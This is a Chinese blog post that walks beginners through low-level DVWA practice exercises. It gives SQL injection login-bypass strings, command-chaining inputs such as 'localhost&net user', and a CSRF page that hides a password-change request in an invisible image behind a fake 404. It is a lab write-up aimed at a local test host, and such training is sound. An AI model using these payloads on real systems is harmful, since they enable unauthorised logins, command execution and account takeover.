DVWA v1.9 新手指南

最新推荐文章于 2022-12-13 13:56:41 发布
最新推荐文章于 2022-12-13 13:56:41 发布
阅读量386 收藏 1
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/mxwx2018/p/9571634.html
版权

 

 

DVWA简介

DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。

官网地址:http://www.dvwa.co.uk/

github地址:https://github.com/ethicalhack3r/DVWA

最新版(截止180901)

下载地址:https://github.com/ethicalhack3r/DVWA/archive/v1.9.zip

安装说明

通过文件/config/config.inc.php进行配置

 

DVWA登陆界面

其中一个默认密码:admin/password

 

DVWA共有十个模块,分别是:

Brute Force(暴力(破解))

Command Injection(命令行注入)

CSRF(跨站请求伪造)

File Inclusion(文件包含)

File Upload(文件上传)

Insecure CAPTCHA(不安全的验证码)

SQL Injection(SQL注入)

SQL Injection(Blind)(SQL盲注)

XSS(Reflected)(反射型跨站脚本)

XSS(Stored)(存储型跨站脚本)

 

DVWA分为四个等级的难度:

具体可以通过 DVWA Security 进行难度选择。

 

DVWA知识讲解

Brute Force  --  爆破

LOW 181008

#1  爆破

brupsuite抓包

使用Intruder模块爆破密码

得到admin password

#2  sql注入

我们分析源代码,发现没有任何的过滤

后台数据库查询语句:SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';

admin' or '1'='1

SELECT * FROM `users` WHERE user = 'admin' or '1'='1' AND password = '$pass';  (登陆成功)
SELECT * FROM `users` WHERE user = 'admin123' or '1'='1' AND password = '$pass';  (登陆失败,因为逻辑符号优先级问题,会先执行and,然后执行or)

admin'#
SELECT * FROM `users` WHERE user = 'admin' #' AND password = '$pass';  (登陆成功)

 

Command Injection  --  命令执行

首先确定后台是什么系统,这里是windows

localhost&net user  先执行1,不管是否成功,都会执行2

localhost&&net user   如果1执行成功,则执行2

localhost|net user  将1的输出作为2的输入,并且只打印2执行的结果。

localhost||net user  如果1执行失败,则执行2

LOW 181008

 

CSRF  --  跨站脚本攻击

跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。

CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。

而XSS更偏向利用漏洞执行js代码。

LOW 181015

如图,低难度的csrf只是验证输入的两次新密码是否一致,一致就可以修改密码。

抓包如下:

构造payload:

A) 最基础的:

http://192.168.153.130/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#

当受害者点击了这个链接,他的密码就会被改成password

这种攻击不加伪装,链接一眼就能看出来是改密码的,而且受害者点了链接之后看到这个页面就会知道自己的密码被篡改了。

B) 改进版

现实攻击场景下,这种方法需要事先在公网上传一个攻击页面,诱骗受害者去访问,真正能够在受害者不知情的情况下完成CSRF攻击。这里为了方便演示在本地写一个test.html,下面是具体代码。

<img src="http://192.168.153.130/dvwa/vulnerabilities/csrf/?password_new=11111111&password_conf=11111111&Change=Change#" border="0" style="display:none;"/>

<h1>404<h1>

<h2>file not found.<h2>

当受害者访问test.html时,会误认为是自己点击的是一个失效的url,但实际上已经遭受了CSRF攻击,密码已经被修改为了11111111。

 

显示修改成功。

转载于:https://www.cnblogs.com/mxwx2018/p/9571634.html

CERES123456
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA V1.9:File Upload(文件上传)
qq_43233085的博客
01-25 483
DVWA V1.9:File Upload(文件上传)File Inclusion 介绍Low 级别核心代码官方提示漏洞利用Medium 级别核心代码官方提示漏洞利用High 级别核心代码官方提示漏洞利用Impossible 级别核心代码官方提示 File Inclusion 介绍 上传的文件是Web应用程序的一大风险。 许多攻击的第一步是让一些代码攻击系统,然后攻击者只需要找到一种方法来执行代码...
DVWA下载、安装及使用教程,网络安全小白必看!
hack0919的博客
06-12 5587
DVWA是一款基于PHP和mysql开发的web靶场练习平台,集成了常见的Web漏洞
DVWA靶场的搭建
m0_59856804的博客
12-13 1242
DVWA靶场的搭建 PHP study中搭建 Kali中搭建Docker Kali 中搭建DVWA Docker中搭建DVWA
DVWA(Damn Vulnerable Web Application)程序源码v1.9稳定版.zip
02-03
DVWA(Damn Vulnerable Web Application)程序源码v1.9稳定版 需要的赶紧下载哦 最新吧 因外国网站连接失败的原因下载速度慢或者无法打开所以为你们提供的
新手指南DVWA 1.9 全级别教程
01-03
新手指南DVWA 1.9 全级别教程
DVWA Installation
08-15
**DVWA(Damn Vulnerable Web Application)安装指南** Damn Vulnerable Web Application,简称DVWA,是一个专门为网络安全教育设计的开源Web应用程序。它包含了各种常见Web应用漏洞,如SQL注入、跨站脚本(XSS)、...
新手指南DVWA 1.9 全级别教程 PDF
08-18
新手指南DVWA 1.9 全级别教程 PDF格式
网络渗透测试平台DVWA-1.9
12-03
DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
DVWA实验讲解
T_Tzz的博客
08-10 1830
暴力破解(https://www.cnblogs.com/bmjoker/p/9096225.html) XSS解析(https://www.freebuf.com/articles/web/129308.html) 附录: 逻辑漏洞简介(https://www.cnblogs.com/bmjoker/p/9096474.html) Web渗透测试中常见逻辑漏洞解析与实战(https://...
Dvwa的低难度通关
h0ld1rs的博客
07-31 480
目录搭建低难度通关brute forceCommand InjectionCSRFFile InclusionFile Upload 搭建 使用docker搭建 docker search dvwa docker pull xxx docker run xxx 详细说一下搭建后的情况 低难度通关 搭建好后想先看一下源代码的,然后发现有这么多种php文件,应该是说的表示难度。 难度的选择在这里更改 brute force 查看low.php的源代码 发现没有任何的防御手段,我们直接用burp抓包,进
DVWA练习平台
04-24
是一个用来进行安全脆弱性鉴定的 PHP /MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
新手指南DVWA-1.9全级别教程之SQL Injection
weixin_30345577的博客
09-12 476
*本文原创作者:lonehand,转载须注明来自FreeBuf.COM 目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还请大家指正。 DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用...
新手指南DVWA-1.9全级别教程之CSRF
weixin_50464560的博客
03-19 496
目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,并且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还请大家指正。DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分...
DVWA通关教程
weixin_62957220的博客
05-18 2202
1.首先先把难度调为low,进行brute force 首先审计代码 <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query =
DVWA V1.9:SQL Injection(SQL注入)
qq_43233085的博客
01-26 557
DVWA V1.9:SQL Injection(SQL注入)SQL Injection 介绍Low 级别核心代码官方提示漏洞利用Medium 级别核心代码官方提示漏洞利用High 级别核心代码官方提示漏洞利用Impossible 级别核心代码官方提示 SQL Injection 介绍 SQL注入攻击包括通过从客户端到应用程序的输入数据插入或“注入”SQL查询。 成功的SQL注入漏洞可以从数据库读取...
dvwa靶场之暴力破解(low级别)<运用burp suite工具>
m0_63314341的博客
01-17 6351
首先,我们需要做好一些准备工作。 1.dvwa靶场的搭建(phpstudy) 2.burp suite工具的安装 3.对于将要爆破的浏览器进行代理插件(proxy)的安装以及证书(ca)的安装 4.设置自己电脑的代理 代理插件的下载以及证书的下载以及对自己电脑的设置都是为了我们的burp suite能够在浏览器上成功的抓上包。 本篇文章重在讲述实操过程,请...
DVWA-CSP Bypass详解
Mr_helloword的博客
08-06 1138
CSP Bypass靶场练习 CSP简介 CSP全称是: Content-Security-Policy, 内容安全策略。 是指HTTP返回报文头中的标签,浏览器会根据标签中的内容,判断哪些资源可以加载或执行。主要是为了缓解潜在的跨站脚本问题(XSS),浏览器的扩展程序系统引入了内容安全策略这个概念。原来应对XSS攻 时,主要采用函数过滤转义输入中的特殊字符、标签、文本来规避攻击。CSP的实质就是白名单制度,开发人员明确告诉客户端,哪 些外部资源可以加载和执行。开发者只需要提供配置,实现和执行全部由浏览器完
新手指南DVWA-1.9全级别教程之File Inclusion
weixin_50464560的博客
03-19 442
目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还请大家指正。DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分别是Brut
docker dvwa
最新发布
05-11
Docker是一种轻量级的容器技术,它可以将应用程序及其依赖项打包到一个可移植的容器中,并在任何地方运行,而不会出现任何依赖关系或环境问题。DVWA(Damn Vulnerable Web Application)是一个用于演示Web应用程序安全漏洞的开源Web应用程序。 在Docker中使用DVWA非常方便,您只需要从Docker Hub下载DVWA镜像,然后在Docker中运行即可。通过这种方式,您可以快速轻松地搭建一个Web应用程序漏洞测试环境,进行安全测试和漏洞挖掘。 如果您想进一步了解Docker和DVWA的使用,可以参考以下链接: - Docker官方文档:https://docs.docker.com/ - DVWA官方网站:http://www.dvwa.co.uk/ - Docker Hub中的DVWA镜像:https://hub.docker.com/r/vulnerables/web-dvwa/

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值